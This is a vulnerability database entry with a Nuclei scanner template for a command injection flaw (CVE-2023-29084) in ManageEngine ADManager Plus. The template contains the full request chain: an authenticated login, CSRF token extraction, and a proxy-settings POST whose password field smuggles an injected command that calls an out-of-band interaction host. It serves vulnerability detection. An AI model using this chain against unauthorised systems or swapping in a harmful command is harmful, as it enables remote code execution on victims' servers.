nuclei | ProjectDiscovery | NUCLEI:CVE-2023-29084
History: Apr 18, 2023 - 10:03 a.m.

ManageEngine ADManager Plus - Command Injection

2023-04-18 10:03:47
ProjectDiscovery
github.com
Tags: zohocorp, manageengine_admanager_plus, cve2023, packetstorm, rce, oast, authenticated, command injection, remote code execution, unauthorized access, sensitive information

CVSS3: 7.2 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.335 Low
Percentile: 97.1%

Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
id: CVE-2023-29084

info:
  name: ManageEngine ADManager Plus - Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
  reference:
    - https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
    - http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
    - https://manageengine.com
    - https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-29084
    cwe-id: CWE-77
    epss-score: 0.37079
    epss-percentile: 0.97178
    cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_admanager_plus
  tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp
variables:
  cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"

http:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
      - |
        GET /home.do HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/json/admin/saveServerSettings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"message":"'
          - 'Proxy Settings'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: kval
        name: admpcsrf
        internal: true
        kval:
          - admpcsrf
        part: header
# digest: 490a0046304402203b40c67a84b05f52a1cc250c89d9d44375d1a0c33d9f1bc54e9d63819b04e2e00220698ec8d0a6e93ac02207ffb5042b97f54896736e55568b992c616c8dc5924bb5:922c64590222798bb761d5b6d8e72950
